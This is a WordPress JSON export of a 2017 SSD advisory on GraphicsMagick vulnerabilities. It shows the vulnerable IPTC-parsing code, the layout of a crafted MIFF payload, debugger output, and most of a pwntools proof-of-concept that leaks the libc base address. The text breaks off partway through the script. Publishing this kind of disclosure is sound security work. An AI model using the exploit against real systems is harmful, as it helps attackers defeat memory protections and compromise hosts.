{"id":10203,"date":"2017-10-31T14:21:40","date_gmt":"2017-10-31T22:21:40","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/31\/news-3976\/"},"modified":"2017-10-31T14:21:40","modified_gmt":"2017-10-31T22:21:40","slug":"news-3976","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/31\/news-3976\/","title":{"rendered":"SSD Advisory \u2013 GraphicsMagick Multiple Vulnerabilities"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 31 Oct 2017 17:25:29 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3494\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3494');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in GraphicsMagick.<\/p>\n<p>GraphicsMagick is &#8220;The swiss army knife of image processing. Comprised of 267K physical lines (according to David A. Wheeler&#8217;s SLOCCount) of source code in the base package (or 1,225K including 3rd party libraries) it provides a robust and efficient collection of tools and libraries which support reading, writing, and manipulating an image in over 88 major formats including important formats like DPX, GIF, JPEG, JPEG-2000, PNG, PDF, PNM, and TIFF.&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Memory Information Disclosure<\/li>\n<li>Heap Overflow<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researchers, Jeremy Heng (@nn_amon) and Terry Chia (Ayrx), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> The vendor has released patches to address these vulnerabilities (15237:e4e1c2a581d8 and 15238:7292230dd18).<\/p>\n<p>For more details: ftp:\/\/ftp.graphicsmagick.org\/pub\/GraphicsMagick\/snapshots\/ChangeLog.txt<\/p>\n<p><span id=\"more-3494\"><\/span><\/p>\n<p><strong><u>Vulnerabilities details<\/u><\/strong><\/p>\n<p><strong>Memory Information Disclosure<\/strong><br \/> GraphicsMagick is vulnerable to a memory information disclosure vulnerability found in <code><em>DescribeImage<\/em><\/code> function of the <code><em>magick\/describe.c<\/em><\/code> file.<\/p>\n<p>The portion of the code containing the vulnerability responsible of printing the IPTC Profile information contained in the image. <\/p>\n<p>This vulnerability can be triggered with a specially crafted MIFF file.<\/p>\n<p>The code which triggers the vulnerable code path is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244a7480371160\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8220;`c   63 MagickExport MagickPassFail DescribeImage(Image *image,FILE *file,   64                                           const MagickBool verbose)   65 {  &#8230;  660       for (i=0; i &lt; profile_length; )  661         {  662           if (profile[i] != 0x1c)  663             {  664               i++;  665               continue;  666             }  667           i++;  \/* skip file separator *\/  668           i++;  \/* skip record number *\/  &#8230;  725           i++;  726           (void) fprintf(file,&#8221;    %.1024s:n&#8221;,tag);  727           length=profile[i++] &lt;&lt; 8;  728           length|=profile[i++];  729           text=MagickAllocateMemory(char *,length+1);  730           if (text != (char *) NULL)  731             {  732               char  733                 **textlist;  734  735               register unsigned long  736                 j;  737  738               (void) strncpy(text,(char *) profile+i,length);  739               text[length]=&#8217;\u0000&#8217;;  740               textlist=StringToList(text);  741               if (textlist != (char **) NULL)  742                 {  743                   for (j=0; textlist[j] != (char *) NULL; j++)  744                     {  745                       (void) fprintf(file,&#8221;  %sn&#8221;,textlist[j]);  &#8230;  752           i+=length;  753         }  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0051 seconds] -->  <\/p>\n<p>The value in  <code>profile_length<\/code> variable is set in the following field in the MIFF header: <em>profile-iptc=8<\/em><\/p>\n<p>There is an out-of-bounds buffer dereference whenever <code>profile[i]<\/code> is accessed because the increments of <code>i<\/code> is never checked. <\/p>\n<p>If we break on line 738 of <code>describe.c<\/code>, we can explore what is present on the heap during the <code>strncpy<\/code> operation.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244b0905910261\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/2xg profile  0x8be210:    0x08000a001c414141    0x00007ffff690fba8<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b0905910261-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b0905910261-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b0905910261-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">2xg<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">profile<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b0905910261-2\"><span class=\"crayon-cn\">0x8be210<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x08000a001c414141<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x00007ffff690fba8<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>The 8 bytes <code>0x08000a001c414141<\/code> is the profile payload present in the specially crafted MIFF file.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244b3600706706\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 41 41 41 &#8211; padding  1C &#8211; sentinel check in line 662  00 &#8211; padding  0A &#8211; &#8220;Priority&#8221; tag  08 00 &#8211; 8 in big endian, the length<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b3600706706-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b3600706706-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b3600706706-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b3600706706-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b3600706706-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b3600706706-1\"><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">padding<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b3600706706-2\"><span class=\"crayon-cn\">1C<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sentinel <\/span><span class=\"crayon-e\">check <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">line<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">662<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b3600706706-3\"><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">padding<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b3600706706-4\"><span class=\"crayon-cn\">0A<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Priority&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">tag<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b3600706706-5\"><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">big <\/span><span class=\"crayon-v\">endian<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">length<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<p>If we examine the value <code>0x00007ffff690fba8<\/code> adjacent to the payload, it becomes apparent that it is an address within the <code>main_arena<\/code> struct in libc.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244b5976591057\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/xw 0x00007ffff690fba8  0x7ffff690fba8 &lt;main_arena+136&gt;:    0x008cdc40  gef\u27a4  vmmap libc  Start              End                Offset             Perm Path  0x00007ffff654b000 0x00007ffff670b000 0x0000000000000000 r-x  \/lib\/x86_64-linux-gnu\/libc-2.23.so  0x00007ffff670b000 0x00007ffff690b000 0x00000000001c0000 &#8212;  \/lib\/x86_64-linux-gnu\/libc-2.23.so  0x00007ffff690b000 0x00007ffff690f000 0x00000000001c0000 r&#8211;  \/lib\/x86_64-linux-gnu\/libc-2.23.so  0x00007ffff690f000 0x00007ffff6911000 0x00000000001c4000 rw-  \/lib\/x86_64-linux-gnu\/libc-2.23.so<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59f8f774244b5976591057-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59f8f774244b5976591057-12\">12<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-1\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">xw<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00007ffff690fba8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-2\"><span class=\"crayon-cn\">0x7ffff690fba8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">main_arena<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">136<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0x008cdc40<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-3\"><span class=\"crayon-i\">gef<\/span>\u27a4<span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">vmmap <\/span><span class=\"crayon-e\">libc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-4\"><span class=\"crayon-e\">Start&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">End<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Offset&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">Perm <\/span><span class=\"crayon-i\">Path<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-5\"><span class=\"crayon-cn\">0x00007ffff654b000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00007ffff670b000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">x<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-6\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gnu<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.23.so<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-7\"><span class=\"crayon-cn\">0x00007ffff670b000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00007ffff690b000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000000001c0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-8\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gnu<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.23.so<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-9\"><span class=\"crayon-cn\">0x00007ffff690b000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00007ffff690f000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000000001c0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-10\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gnu<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.23.so<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59f8f774244b5976591057-11\"><span class=\"crayon-cn\">0x00007ffff690f000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00007ffff6911000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00000000001c4000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rw<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59f8f774244b5976591057-12\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">lib<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x86_64<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gnu<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">libc<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">2.23.so<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>Now we can calculate the offset to libc base &#8211; <code>0x3c4b98<\/code><\/p>\n<p><u>Proof of Concept<\/u><\/p>\n<p>$ python miff\/readexploit.py<br \/> [+] Starting local process &#8216;\/usr\/bin\/gm&#8217;: pid 20019<br \/> [+] Receiving all data: Done (1.27KB)<br \/> [*] Process &#8216;\/usr\/bin\/gm&#8217; stopped with exit code 0 (pid 20019)<br \/> [*] Main Arena Leak: 0x7f72948adb98<br \/> [*] libc Base: 0x7f72944e9000<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59f8f774244b8242621114\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Python<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/python  # GraphicsMagick IPTC Profile libc Leak    from pwn import *    directory = &#8220;DIR&#8221;  partitions = (&#8216;id=ImageMagick  version=1.0nclass=DirectClass  matte=Falsen&#8217; +                &#8216;columns=1  rows=1  depth=16nscene=1nmontage=1&#215;1+0+0nprofil&#8217; +                &#8216;e-iptc=&#8217;,                &#8216;nx0cn:x1a&#8217;,                &#8216;nx00&#8217;,                &#8216;nx00xbexbexbexbexbexben&#8217;)  output = &#8220;readexploit.miff&#8221;  length = 8    #libc_main_arena_entry_offset = 0x3c4ba8  libc_main_arena_entry_offset = 0x3c4b98    def main():      data = &#8220;AAA&#8221; + &#8220;x1c&#8221; + &#8220;x00&#8243; + chr(10) + p16(0x8, endian=&#8221;big&#8221;)      header = partitions[0] + str(length) + partitions[1]      payload = header + directory + partitions[2] + data + partitions[3]      file(output, &#8220;w&#8221;).write(payload)        p = process(executable=&#8221;gm&#8221;, argv=[&#8220;identify&#8221;, &#8220;-verbose&#8221;, output])      output_leak = p.recvall()      priority_offset = output_leak.index(&#8220;Priority:&#8221;) + 12      montage_offset = 